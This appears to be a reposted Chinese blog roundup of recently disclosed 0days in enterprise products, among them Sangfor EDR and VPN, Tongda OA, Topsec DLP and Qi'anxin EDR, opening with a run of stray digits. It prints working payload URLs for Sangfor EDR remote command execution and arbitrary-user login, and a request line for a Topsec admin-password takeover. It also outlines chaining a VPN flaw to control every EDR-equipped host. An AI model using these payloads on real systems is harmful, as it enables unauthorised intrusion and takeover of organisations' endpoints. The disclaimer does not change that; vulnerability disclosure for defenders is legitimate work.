近期公开0day及漏洞汇总
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
近期公开0day及漏洞汇总
本文原载于公众号:墨攻SEC
作者:TBOsec
近期由于**暴露出很多0day及新的漏洞,下面对获取到的一些信息进行了汇总...
请勿使用以下漏洞进行非法活动及未授权测试!!
一、深信服EDR设备RCE:
Payload:https://ip/tool/log/c.php?strip_slashes=system&host=id
二、深信服EDR设备任意用户登录登录:
Payload:https://ip/ui/login.php?user=admin
通过更改user参数的值即可实现任意用户登录
三、通达OA-v11.6 Getshell:
复现该漏洞会删除auth.inc.php,可能会导致应用的正常使用请勿进行未授权测试
后台回复‘通达oa’可获取利用代码
四、天融信dlp-未授权+越权:
漏洞细节:管理员登录系统系统之后修改密码,未采用原密码校验,且存在未授权访问导致存在越权修改管理员密码。
默认用户superman的uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
五、致远OA-A8-V5最新版:GETshell-某大佬暂未公开
六、奇安信天擎EDR设备RCE:漏洞详情暂未知
影响范围:使用奇安信天擎EDR产品的主机
可以利用深信服vpn漏洞进入内网,然后利用此漏洞控制所有装有edr的机器
七、深信服vpn RCE:漏洞详情暂未知
最后:
近期蓝队应该关注的漏洞:
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 FreeBuf_347714 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏


相关推荐
蜜罐如何在攻防演练中战术部防?
2021-03-25
2021攻防演练行动之蓝军经验总结
2021-03-25
防守方须排查的57个安全漏洞与解决方案
2021-03-17
文章目录